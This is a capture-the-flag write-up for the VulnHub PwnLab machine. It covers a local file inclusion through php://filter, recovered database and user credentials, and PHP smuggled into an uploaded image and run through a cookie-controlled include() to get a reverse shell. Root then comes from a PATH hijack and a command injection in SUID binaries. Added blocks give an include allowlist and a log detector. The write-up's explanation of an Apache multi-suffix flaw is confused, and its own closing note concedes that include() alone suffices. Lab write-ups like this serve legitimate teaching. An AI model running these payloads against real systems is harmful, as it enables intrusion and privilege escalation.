[vulnhub] PwnLab (upload bypass, Apache multi-suffix parsing)

Author: 天线锅仔 | Published 2022-01-18 10:22

Disclaimer

The host attacked in this article was legally authorized for testing. The tools and methods used here are for learning and exchange only; do not use the tools or the approach described for any illegal purpose. I accept no responsibility for any consequences of doing so, nor for any misuse or damage caused.

Service enumeration

┌──(root💀kali)-[~/pg/PwnLab]
└─# nmap -p- 192.168.151.29 --open                                                
Starting Nmap 7.91 ( https://nmap.org ) at 2022-01-17 07:50 EST
Nmap scan report for 192.168.151.29
Host is up (0.22s latency).
Not shown: 65257 closed ports, 274 filtered ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT      STATE SERVICE
80/tcp    open  http
111/tcp   open  rpcbind
3306/tcp  open  mysql
53955/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 94.55 seconds
                                                                                                                                                                                                                                                                                                                             
┌──(root💀kali)-[~/pg/PwnLab]
└─# nmap -sV -T5 -A -O 192.168.151.29 -p 80,111,3306,53955
Starting Nmap 7.91 ( https://nmap.org ) at 2022-01-17 07:52 EST
Nmap scan report for 192.168.151.29
Host is up (0.23s latency).

PORT      STATE SERVICE VERSION
80/tcp    open  http    Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: PwnLab Intranet Image Hosting
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          35282/udp   status
|   100024  1          43712/tcp6  status
|   100024  1          47161/udp6  status
|_  100024  1          53955/tcp   status
3306/tcp  open  mysql   MySQL 5.5.47-0+deb8u1
| mysql-info: 
|   Protocol: 10
|   Version: 5.5.47-0+deb8u1
|   Thread ID: 38
|   Capabilities flags: 63487
|   Some Capabilities: DontAllowDatabaseTableColumn, ODBCClient, Speaks41ProtocolNew, LongPassword, FoundRows, SupportsTransactions, InteractiveClient, Speaks41ProtocolOld, IgnoreSigpipes, LongColumnFlag, Support41Auth, IgnoreSpaceBeforeParenthesis, SupportsCompression, SupportsLoadDataLocal, ConnectWithDatabase, SupportsMultipleStatments, SupportsAuthPlugins, SupportsMultipleResults
|   Status: Autocommit
|   Salt: mT<l1J`%6|5-#fZn=&BZ
|_  Auth Plugin Name: mysql_native_password
53955/tcp open  status  1 (RPC #100024)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 3.12 (94%), Linux 4.4 (94%), Linux 4.9 (94%), Linux 3.10 (91%), Linux 3.10 - 4.11 (90%), Linux 3.11 - 4.1 (90%), Linux 3.2 - 4.9 (90%), Linux 2.6.32 (90%), Linux 2.6.32 or 3.10 (90%), Linux 2.6.39 (90%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops

TRACEROUTE (using port 443/tcp)
HOP RTT       ADDRESS
1   227.38 ms 192.168.49.1
2   227.59 ms 192.168.151.29

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 39.73 seconds

Web

┌──(root💀kali)-[~/pg/PwnLab]
└─# python3 /root/dirsearch/dirsearch.py -e* -u http://192.168.151.29 -t 30

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak | HTTP method: GET | Threads: 30 | Wordlist size: 15492

Output File: /root/dirsearch/reports/192.168.151.29/_22-01-17_07-55-55.txt

Error Log: /root/dirsearch/logs/errors-22-01-17_07-55-55.log

Target: http://192.168.151.29/

[07:55:55] Starting:                                        
[07:57:33] 200 -    0B  - /config.php                                       
[07:57:59] 200 -  943B  - /images/                                          
[07:57:59] 301 -  317B  - /images  ->  http://192.168.151.29/images/        
[07:58:02] 200 -  332B  - /index.php/login/                                 
[07:58:02] 200 -  332B  - /index.php                                        
[07:58:09] 200 -  250B  - /login.php                                        
[07:58:59] 301 -  317B  - /upload  ->  http://192.168.151.29/upload/        
[07:59:00] 200 -   19B  - /upload.php                                       
[07:59:00] 200 -  743B  - /upload/   

The scan turns up four PHP files: config.php, index.php, upload.php and login.php,

and two directories: images and upload.

RPC

┌──(root💀kali)-[~/pg/PwnLab]
└─# rpcinfo 192.168.151.29                                                                                                                               1 ⨯
   program version netid     address                service    owner
    100000    4    tcp6      ::.0.111               portmapper superuser
    100000    3    tcp6      ::.0.111               portmapper superuser
    100000    4    udp6      ::.0.111               portmapper superuser
    100000    3    udp6      ::.0.111               portmapper superuser
    100000    4    tcp       0.0.0.0.0.111          portmapper superuser
    100000    3    tcp       0.0.0.0.0.111          portmapper superuser
    100000    2    tcp       0.0.0.0.0.111          portmapper superuser
    100000    4    udp       0.0.0.0.0.111          portmapper superuser
    100000    3    udp       0.0.0.0.0.111          portmapper superuser
    100000    2    udp       0.0.0.0.0.111          portmapper superuser
    100000    4    local     /run/rpcbind.sock      portmapper superuser
    100000    3    local     /run/rpcbind.sock      portmapper superuser
    100024    1    udp       0.0.0.0.137.210        status     106
    100024    1    tcp       0.0.0.0.210.195        status     106
    100024    1    udp6      ::.184.57              status     106
    100024    1    tcp6      ::.170.192             status     106

┌──(root💀kali)-[~/pg/PwnLab]
└─# nmap -sSUC -p 111 192.168.151.29                                                                                                                   130 ⨯
Starting Nmap 7.91 ( https://nmap.org ) at 2022-01-17 08:05 EST
Nmap scan report for 192.168.151.29
Host is up (0.33s latency).

PORT    STATE         SERVICE
111/tcp open          rpcbind
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          35282/udp   status
|   100024  1          43712/tcp6  status
|   100024  1          47161/udp6  status
|_  100024  1          53955/tcp   status
111/udp open|filtered rpcbind
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          35282/udp   status
|   100024  1          43712/tcp6  status
|   100024  1          47161/udp6  status
|_  100024  1          53955/tcp   status

Nmap done: 1 IP address (1 host up) scanned in 26.38 seconds

Nothing particularly useful here.

LFI

The home page URL has the form:

http://192.168.151.29/?page=

At the moment page takes only two values, login and upload.

A PHP stream wrapper can be used to trigger the file inclusion vulnerability. The following payload reads the source of login:

http://192.168.151.29/?page=php://filter/convert.base64-encode/resource=login

The page prints the source as a base64 string; decoding it gives:

<?php
session_start();
require("config.php");
$mysqli = new mysqli($server, $username, $password, $database);

if (isset($_POST['user']) and isset($_POST['pass']))
{
    $luser = $_POST['user'];
    $lpass = base64_encode($_POST['pass']);

    $stmt = $mysqli->prepare("SELECT * FROM users WHERE user=? AND pass=?");
    $stmt->bind_param('ss', $luser, $lpass);

    $stmt->execute();
    $stmt->store_Result();

    if ($stmt->num_rows == 1)
    {
        $_SESSION['user'] = $luser;
        header('Location: ?page=upload');
    }
    else
    {
        echo "Login failed.";
    }
}
else
{
    ?>
    <form action="" method="POST">
    <label>Username: </label><input id="user" type="test" name="user"><br />
    <label>Password: </label><input id="pass" type="password" name="pass"><br />
    <input type="submit" name="submit" value="Login">
    </form>
    <?php
}

The following payload reads the source of upload:

http://192.168.151.29/?page=php://filter/convert.base64-encode/resource=upload

<?php
session_start();
if (!isset($_SESSION['user'])) { die('You must be log in.'); }
?>
<html>
    <body>
        <form action='' method='post' enctype='multipart/form-data'>
            <input type='file' name='file' id='file' />
            <input type='submit' name='submit' value='Upload'/>
        </form>
    </body>
</html>
<?php 
if(isset($_POST['submit'])) {
    if ($_FILES['file']['error'] <= 0) {
        $filename  = $_FILES['file']['name'];
        $filetype  = $_FILES['file']['type'];
        $uploaddir = 'upload/';
        $file_ext  = strrchr($filename, '.');
        $imageinfo = getimagesize($_FILES['file']['tmp_name']);
        $whitelist = array(".jpg",".jpeg",".gif",".png"); 

        if (!(in_array($file_ext, $whitelist))) {
            die('Not allowed extension, please upload images only.');
        }

        if(strpos($filetype,'image') === false) {
            die('Error 001');
        }

        if($imageinfo['mime'] != 'image/gif' && $imageinfo['mime'] != 'image/jpeg' && $imageinfo['mime'] != 'image/jpg'&& $imageinfo['mime'] != 'image/png') {
            die('Error 002');
        }

        if(substr_count($filetype, '/')>1){
            die('Error 003');
        }

        $uploadfile = $uploaddir . md5(basename($_FILES['file']['name'])).$file_ext;

        if (move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile)) {
            echo "<img src=\"".$uploadfile."\"><br />";
        } else {
            die('Error 4');
        }
    }
}

?>

The following payload reads the source of config:

http://192.168.151.29/?page=php://filter/convert.base64-encode/resource=config

<?php
$server   = "localhost";
$username = "root";
$password = "H4u%QJ_H99";
$database = "Users";
?>

Now we have the MySQL credentials. Since the target exposes MySQL to the network, we can connect to it directly from the attacking machine.

MySQL

Switching to the users database is denied:

MySQL [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| Users              |
+--------------------+
2 rows in set (0.243 sec)

MySQL [(none)]> use users;
ERROR 1044 (42000): Access denied for user 'root'@'%' to database 'users'

But we do have SELECT privilege on the Users database:

MySQL [information_schema]> show grants;
+------------------------------------------------------------------+
| Grants for root@%                                                |
+------------------------------------------------------------------+
| GRANT USAGE ON *.* TO 'root'@'%' IDENTIFIED BY PASSWORD <secret> |
| GRANT SELECT ON `Users`.* TO 'root'@'%'                          |
+------------------------------------------------------------------+
2 rows in set (0.228 sec)

Query the table names and then the table contents:

MySQL [information_schema]> select *  from tables where table_schema = 'Users';
+---------------+--------------+------------+------------+--------+---------+------------+------------+----------------+-------------+-----------------+--------------+-----------+----------------+---------------------+-------------+------------+-------------------+----------+----------------+---------------+
| TABLE_CATALOG | TABLE_SCHEMA | TABLE_NAME | TABLE_TYPE | ENGINE | VERSION | ROW_FORMAT | TABLE_ROWS | AVG_ROW_LENGTH | DATA_LENGTH | MAX_DATA_LENGTH | INDEX_LENGTH | DATA_FREE | AUTO_INCREMENT | CREATE_TIME         | UPDATE_TIME | CHECK_TIME | TABLE_COLLATION   | CHECKSUM | CREATE_OPTIONS | TABLE_COMMENT |
+---------------+--------------+------------+------------+--------+---------+------------+------------+----------------+-------------+-----------------+--------------+-----------+----------------+---------------------+-------------+------------+-------------------+----------+----------------+---------------+
| def           | Users        | users      | BASE TABLE | InnoDB |      10 | Compact    |          3 |           5461 |       16384 |               0 |            0 |  10485760 |           NULL | 2016-03-17 10:17:53 | NULL        | NULL       | latin1_swedish_ci |     NULL |                |               |
+---------------+--------------+------------+------------+--------+---------+------------+------------+----------------+-------------+-----------------+--------------+-----------+----------------+---------------------+-------------+------------+-------------------+----------+----------------+---------------+
1 row in set (1.383 sec)

MySQL [information_schema]> select * from Users.users;
+------+------------------+
| user | pass             |
+------+------------------+
| kent | Sld6WHVCSkpOeQ== |
| mike | U0lmZHNURW42SQ== |
| kane | aVN2NVltMkdSbw== |
+------+------------------+
3 rows in set (0.251 sec)

After base64-decoding the pass column (login.php base64-encodes the password before comparing), we have three sets of credentials:

kent:JWzXuBJJNy
mike:SIfdsTEn6I
kane:iSv5Ym2GRo

Logging in with these takes us to the upload page, but every upload bypass attempt fails...

Reading index.php the same way:

<?php
//Multilingual. Not implemented yet.
//setcookie("lang","en.lang.php");
if (isset($_COOKIE['lang']))
{
    include("lang/".$_COOKIE['lang']);
}
// Not implemented yet.
?>
<html>
<head>
<title>PwnLab Intranet Image Hosting</title>
</head>
<body>
<center>
<img src="images/pwnlab.png"><br />
[ <a href="/">Home</a> ] [ <a href="?page=login">Login</a> ] [ <a href="?page=upload">Upload</a> ]
<hr/><br/>
<?php
    if (isset($_GET['page']))
    {
        include($_GET['page'].".php");
    }
    else
    {
        echo "Use this server to upload and share image files inside the intranet";
    }
?>
</center>
</body>
</html>

Note this line: it includes a file whose name is taken from a cookie that an external user controls. If that value points at our image with embedded PHP, the file parsing vulnerability is triggered:

include("lang/".$_COOKIE['lang']);
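Both include sites in this target (the ?page= parameter above and the lang cookie here) concatenate user input straight into include(). The following is an added example, not code from the write-up or from the PwnLab VM: it shows the allowlist lookup that would have closed both holes, and a small detector that flags the two request shapes used above in access-log lines. The lang keys, and the assumption that cookies are logged via a custom LogFormat with %{Cookie}i, are hypothetical.

```python
import re
from typing import Dict, List, Optional
from urllib.parse import unquote

# Safe pattern: map a user-supplied key onto a fixed file, never build a path from it.
PAGE_ALLOWLIST = {"login": "login.php", "upload": "upload.php"}
LANG_ALLOWLIST = {"en": "lang/en.lang.php"}  # hypothetical: index.php only hints at en.lang.php

def resolve_include(value: str, allowlist: Dict[str, str]) -> Optional[str]:
    """Return the fixed file for an allowed key, None otherwise.
    php://filter/... and ../upload/x.jpg can never equal an allowlist key."""
    return allowlist.get(value)

# Detection side: stream wrappers or traversal in ?page=, or a lang cookie that is
# anything other than a plain allowed key.
WRAPPER_RE = re.compile(r"(?i)\b(php|data|expect|phar|zip|file)://")
TRAVERSAL_RE = re.compile(r"(\.\./|\.\.\\|%2e%2e)", re.I)

def suspicious_include(request: str, cookie: str = "") -> List[str]:
    """Return the reasons a request/cookie pair looks like an include attack (empty if clean)."""
    reasons = []
    m = re.search(r"[?&]page=([^&\s]*)", unquote(request))
    if m:
        page = m.group(1)
        if WRAPPER_RE.search(page):
            reasons.append("wrapper in page")
        elif TRAVERSAL_RE.search(page):
            reasons.append("traversal in page")
        elif page not in PAGE_ALLOWLIST:
            reasons.append("unknown page")
    m = re.search(r"(?:^|;\s*)lang=([^;]*)", unquote(cookie))
    if m:
        lang = m.group(1)
        if TRAVERSAL_RE.search(lang) or "/" in lang:
            reasons.append("path in lang cookie")
        elif lang not in LANG_ALLOWLIST:
            reasons.append("unknown lang")
    return reasons

# Constructed sample log entries (request line, Cookie header); "-" means no cookie.
SAMPLE_LOG = [
    ("GET /?page=login HTTP/1.1", "-"),
    ("GET /?page=php://filter/convert.base64-encode/resource=login HTTP/1.1", "-"),
    ("GET /index.php HTTP/1.1", "lang=../upload/ae3c0cf901daed40d3382c6c67c15a63.jpg"),
]

def scan(entries=SAMPLE_LOG):
    """Return only the entries that raised at least one reason."""
    hits = []
    for req, ck in entries:
        reasons = suspicious_include(req, ck)
        if reasons:
            hits.append((req, reasons))
    return hits
```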

First upload an image, intercepting the request with Burp Suite and hiding the rever_shell.php code inside the image data. This yields an image with embedded PHP: ae3c0cf901daed40d3382c6c67c15a63.jpg

Use curl to send the cookie and trigger the include:

┌──(root💀kali)-[~/pg/PwnLab]
└─# curl -v --cookie "lang=../upload/ae3c0cf901daed40d3382c6c67c15a63.jpg" http://192.168.151.29/index.php
*   Trying 192.168.151.29:80...
* Connected to 192.168.151.29 (192.168.151.29) port 80 (#0)
> GET /index.php HTTP/1.1
> Host: 192.168.151.29
> User-Agent: curl/7.74.0
> Accept: */*
> Cookie: lang=../upload/ae3c0cf901daed40d3382c6c67c15a63.jpg
> 


The reverse shell connects back:

└─# nc -lnvp 4242                                                                                                              130 ⨯
listening on [any] 4242 ...
connect to [192.168.49.151] from (UNKNOWN) [192.168.151.29] 38751
Linux pwnlab 3.16.0-4-686-pae #1 SMP Debian 3.16.7-ckt20-1+deb8u4 (2016-02-29) i686 GNU/Linux
 11:03:44 up  3:17,  0 users,  load average: 0.00, 0.01, 0.05
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ whoami
www-data

Privilege escalation

The user credentials obtained above:

kent:JWzXuBJJNy
mike:SIfdsTEn6I
kane:iSv5Ym2GRo

kent and kane can be switched to with su using the passwords above.

local.txt is obtained as kane.

kane's home directory also contains an SUID binary, msgmike, owned by mike.

Inspect it with strings:

kane@pwnlab:~$ strings msgmike
strings msgmike
/lib/ld-linux.so.2
libc.so.6
_IO_stdin_used
setregid
setreuid
system
__libc_start_main
__gmon_start__
GLIBC_2.0
PTRh 
QVh[
[^_]
cat /home/mike/msg.txt

It runs cat /home/mike/msg.txt through system(), and cat is called without an absolute path.

We can therefore escalate by hijacking the cat command via PATH.

Prepend /home/kane to $PATH:

export PATH=/home/kane:$PATH

Create a file named cat and make it executable:

touch /home/kane/cat
chmod +x /home/kane/cat

Write the following script into /home/kane/cat:

#!/bin/bash
bash -p

Run msgmike, which now executes /home/kane/cat, and we become mike:

kane@pwnlab:~$ ./msgmike
./msgmike
mike@pwnlab:~$whoami
whoami
mike

mike's home directory contains msg2root, another SUID binary, this one owned by root. Again inspect it with strings:

mike@pwnlab:/home/mike$ strings msg2root
strings msg2root
/lib/ld-linux.so.2
libc.so.6
_IO_stdin_used
stdin
fgets
asprintf
system
__libc_start_main
__gmon_start__
GLIBC_2.0
PTRh
[^_]
Message for root: 
/bin/echo %s >> /root/messages.txt

It runs /bin/echo %s >> /root/messages.txt, where %s is our input (read with fgets and formatted into the command string with asprintf), so this command can be hijacked in the same way:

Message for root: id & bash -p
id & bash -p
bash-4.3# id


bash-4.3# whoami
whoami
root


Grab proof.txt:

bash-4.3# more proof.txt
more proof.txt
8ae5471d5970a5...

Summary

The upload exploitation works as follows.
First, the Apache version is 2.4.10; Apache 2.4.0 to 2.4.29 has a parsing vulnerability, see here.
The exploitation on this target uses the Apache HTTPD multi-suffix parsing vulnerability.
What is the multi-suffix parsing vulnerability?
If a file contains PHP code, then as long as the requested URL contains a .php suffix, the file is parsed as PHP, for example test.php.jpg.
Look at this target's source code and note this line:

$uploadfile = $uploaddir . md5(basename($_FILES['file']['name'])).$file_ext;

This names the uploaded file as the MD5 of the original file name, with a suffix from the extension whitelist, so under normal circumstances we cannot bypass the upload restriction.
But because of this line in index.php

include("lang/".$_COOKIE['lang']);

the lang value is under our control (set as a cookie with curl). Now we only need to replace lang with our image containing PHP; because the included image is inside a PHP file, Apache's file parsing vulnerability is triggered and it is executed as PHP code.
Proof of concept:

<?php
include('evil.jpg');
?>
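To make the multi-suffix behaviour concrete, here is an added example (not code from the write-up or from Apache): a small model of how mod_mime chooses a handler when a file name has several dot-separated extensions, contrasting the AddHandler form with the FilesMatch form. It reproduces the documented rule rather than calling Apache; the sample file names are constructed.

```python
import re
from typing import Dict, Optional, Tuple

PHP = "application/x-httpd-php"

def handler_addhandler(filename: str, mapped_exts=(".php",)) -> Optional[str]:
    """AddHandler application/x-httpd-php .php
    mod_mime examines every extension after the first dot, so 'test.php.jpg' is
    handed to PHP because '.php' is one of its extensions; '.jpg' only sets the
    Content-Type and does not clear the handler."""
    parts = filename.split(".")[1:]            # 'test.php.jpg' -> ['php', 'jpg']
    return PHP if any("." + p.lower() in mapped_exts for p in parts) else None

def handler_filesmatch(filename: str) -> Optional[str]:
    """<FilesMatch "\\.php$"> SetHandler application/x-httpd-php </FilesMatch>
    Only the final extension counts, so 'test.php.jpg' is served as a plain file."""
    return PHP if re.search(r"\.php$", filename, re.I) else None

def compare(names) -> Dict[str, Tuple[Optional[str], Optional[str]]]:
    """Map each file name to (handler under AddHandler, handler under FilesMatch)."""
    return {n: (handler_addhandler(n), handler_filesmatch(n)) for n in names}

# Constructed file names: a normal script, the classic double extension, and the
# renamed upload from the target (MD5 name with a whitelisted suffix).
SAMPLE_NAMES = ["index.php", "test.php.jpg", "ae3c0cf901daed40d3382c6c67c15a63.jpg"]
```

Debian's packaged PHP module ships the FilesMatch form, so the serving rule alone would not execute a .jpg on such a host; what matters on this target is that include() runs whatever file it is given as PHP regardless of how Apache would serve it.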

Article link: https://www.haomeiwen.com/subject/byhkhrtx.html